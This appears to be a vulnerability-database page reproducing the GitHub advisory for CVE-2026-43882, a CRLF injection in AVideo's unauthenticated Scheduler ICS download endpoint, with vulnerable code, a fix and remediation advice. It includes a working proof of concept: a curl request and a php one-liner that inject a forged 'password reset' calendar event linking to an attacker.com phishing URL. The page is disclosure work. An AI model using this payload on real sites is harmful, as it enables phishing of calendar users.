AVideo CVE-2026-43882
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The unauthenticated plugin/Scheduler/downloadICS.php endpoint passes attacker-controlled title, description, and joinURL parameters into Scheduler::downloadICS(), which builds an ICS calendar file via the ICS helper class. ICS::escape_string() (objects/ICS.php:167-169) only escapes , and ; and does NOT neutralize CR/LF, so attacker CRLF bytes inside a property value break out and inject arbitrary ICS lines - including END:VEVENT / BEGIN:VEVENT pairs that add entire attacker-controlled calendar events. Because the malicious .ics file is served from the victim's trusted AVideo origin, this enables high-credibility calendar phishing: forged meetings with attacker-chosen SUMMARY, URL, LOCATION, and DESCRIPTION landing in the victim's calendar after import.
Details
Vulnerable code path
plugin/Scheduler/downloadICS.php - unauthenticated entry point:
if(!AVideoPlugin::isEnabledByName('Scheduler')){
forbiddenPage('Scheduler is disabled');
}
if(empty($_REQUEST['title'])){ forbiddenPage('Title cannot be empty'); }
if(empty($_REQUEST['date_start'])){ forbiddenPage('date_start cannot be empty'); }
Scheduler::downloadICS($_REQUEST['title'], $_REQUEST['date_start'], @$_REQUEST['date_end'],
@$_REQUEST['reminder'], @$_REQUEST['joinURL'], @$_REQUEST['description']);There is no session check, no CSRF token, no user-role check - only an empty-check on title/date_start and a plugin-enabled check.
plugin/Scheduler/Scheduler.php:367-382 passes inputs directly to the ICS builder:
$props = array(
'location' => $location,
'description' => $description, // attacker-controlled
'dtstart' => $dtstart,
'dtend' => $dtend,
'summary' => $title, // attacker-controlled
'url' => $joinURL, // attacker-controlled
'valarm' => $VALARM,
);
$ics = new ICS($props);
...
echo $icsString;objects/ICS.php:167-169 - incomplete escape:
private function escape_string($str) {
return preg_replace('/([\,;])/','\\\$1', $str);
}Per RFC 5545 §3.3.11, TEXT values must also have CR/LF either folded or encoded as \n. This implementation does neither. ICS::to_string() (line 101) joins every property with "\r\n", so any raw \r\n sequence embedded in a value breaks out of the property line and injects new ICS directives.
Verified exploit output
Running the builder with a CRLF-laden description produces a file with two distinct VEVENT blocks (the second entirely attacker-controlled):
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//hacksw/handcal//NONSGML v1.0//EN
CALSCALE:GREGORIAN
BEGIN:VEVENT
DESCRIPTION:Hello
END:VEVENT
BEGIN:VEVENT
SUMMARY:Injected
URL:http://attacker.com
DTSTART:20260501T000000Z
DTEND:20260501T130000Z
SUMMARY:Legit
URL;VALUE=URI:https://example.com
DTSTAMP:20260424T082123Z
UID:69eb2803d1aa2
END:VEVENT
END:VCALENDARThe injected BEGIN:VEVENT / END:VEVENT pair is standards-compliant and parsed as an additional event by Outlook, Apple Calendar, Google Calendar, and Thunderbird/Lightning.
PoC
- Ensure the Scheduler plugin is enabled on the target (default-shipped optional plugin, commonly enabled on streaming deployments).
- Send an unauthenticated GET request with CRLF-encoded payload in
description:
curl -o malicious.ics \
'http://victim.example.com/plugin/Scheduler/downloadICS.php?title=Team%20Standup&date_start=2026-05-01+12:00&description=Hello%0D%0AEND:VEVENT%0D%0ABEGIN:VEVENT%0D%0ASUMMARY:URGENT%3A%20Password%20Reset%20Required%0D%0ADTSTART:20260601T090000Z%0D%0ADTEND:20260601T100000Z%0D%0AURL:http://attacker.com/phish%0D%0ALOCATION:Online%0D%0ADESCRIPTION:Please%20click%20the%20URL%20to%20confirm%20your%20identity'- The returned file contains two
VEVENTblocks. Import into any standards-compliant calendar client - both events appear in the victim's calendar. The injected event renders with an attacker-chosen clickable URL.
Local reproduction (without needing a running server) using the same code path:
php -r "require 'objects/ICS.php'; \$p = ['description' => \"Hello\r\nEND:VEVENT\r\nBEGIN:VEVENT\r\nSUMMARY:Injected\r\nURL:http://attacker.com\", 'dtstart'=>'2026-05-01', 'dtend'=>'2026-05-01 13:00', 'summary'=>'Legit', 'url'=>'https://example.com']; echo (new ICS(\$p))->to_string();"Produces the two-VEVENT output shown above (verified).
Impact
- Same-origin calendar phishing. The
.icsis served from the trusted AVideo domain, bypassing URL-reputation checks and email-filter suspicion of attacker-hosted attachments. - Arbitrary event spoofing. Attacker controls
SUMMARY,DTSTART,DTEND,URL,LOCATION,DESCRIPTION, and may add further ICS properties (e.g.ORGANIZER,ATTENDEE). Many mainstream calendar clients display theURLfield as a clickable link in the event body. - Integrity: Low - unwanted/forged events are added to the victim's calendar after they import the file.
- Auth: None. Precondition is only that the Scheduler plugin is enabled, which is typical on deployments that use AVideo's scheduled streaming features.
- Confidentiality / Availability: No direct impact.
Not a higher-severity response-splitting bug: PHP's header() blocks CRLF in response headers since 5.1.2, so the CRLF bytes do not escape into HTTP headers - only into the ICS body.
Recommended Fix
Strip or RFC-5545-encode CR/LF in ICS::escape_string() so newline bytes cannot break out of a property line. In objects/ICS.php:167-169:
private function escape_string($str) {
// RFC 5545 §3.3.11: escape backslash, semicolon, comma; encode newlines as \n
$str = str_replace(array("\\", "\r\n", "\r", "\n"), array("\\\\", "\\n", "\\n", "\\n"), $str);
return preg_replace('/([\,;])/', '\\\\$1', $str);
}Additionally, plugin/Scheduler/downloadICS.php should either require authentication or at minimum apply strict input validation (length caps, character whitelists) on title, description, and joinURL - and joinURL should continue to be validated via isValidURL() (already done) before emission. Consider adding a defence-in-depth strip of CR/LF on every $_REQUEST parameter used by Scheduler::downloadICS().
AnalysisAI
Unauthenticated CRLF injection in AVideo's Scheduler plugin allows remote attackers to inject arbitrary calendar events into ICS files served from the victim's trusted domain, enabling high-credibility calendar phishing attacks. The vulnerable endpoint accepts attacker-controlled parameters without sanitization, passes them through an incomplete escape function that does not neutralize carriage-return/line-feed bytes, and constructs RFC 5545-compliant ICS calendar files containing injected VEVENT blocks. Exploitation requires only that the Scheduler plugin be enabled (common default) and user interaction to import the malicious .ics file; no authentication or special configuration is needed. A vendor-released patch is available.
Technical ContextAI
The vulnerability resides in the ICS (iCalendar) calendar file generation stack within AVideo's Scheduler plugin. RFC 5545 TEXT property values must encode newline characters as escaped literals (\n) or use line folding; the ICS helper class does neither. The ICS::escape_string() method (objects/ICS.php lines 167-169) only escapes commas and semicolons via regex, leaving CR/LF bytes unencoded. When ICS::to_string() joins property lines with raw \r\n sequences, attacker-supplied CR/LF bytes embedded in field values (description, summary, joinURL) break the property boundary and inject arbitrary ICS directives. An attacker can inject complete END:VEVENT / BEGIN:VEVENT pairs to add a second calendar event block that is standards-compliant and parseable by Outlook, Apple Calendar, Google Calendar, and Thunderbird. The root cause is CWE-93 (Improper Neutralization of CRLF Sequences in HTTP Headers) applied to calendar protocol generation. Affected product is AVideo (composer package: wwbn/avideo), versions up to and including 29.0, running with the Scheduler plugin enabled.
RemediationAI
Apply the vendor-released patch immediately by updating to the version incorporating commit 764db592f99e545aa86bb9a4ad664ffd14c38ba5 (exact fixed version not stated in input; consult https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv for the tagged release). The patch corrects ICS::escape_string() in objects/ICS.php to replace backslash, CR/LF sequences with proper RFC 5545 encoding (\\, \n, \n, \n) before applying semicolon/comma escaping. If immediate patching is not feasible, disable the Scheduler plugin via the AVideo administration panel-this eliminates the unauthenticated endpoint entirely and is suitable for deployments not actively using scheduled streaming features. As a defense-in-depth measure, apply strict input validation to title, description, and joinURL parameters (length caps, character whitelists, rejection of control characters) at the entry point (plugin/Scheduler/downloadICS.php) before passing to Scheduler::downloadICS(). Note that disabling the plugin prevents legitimate users from downloading calendar invites, so prioritize patching if the feature is in use. Consult https://github.com/WWBN/AVideo/security/advisories/GHSA-mwgh-92m2-wvhv for additional mitigation guidance from the vendor.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-mwgh-92m2-wvhv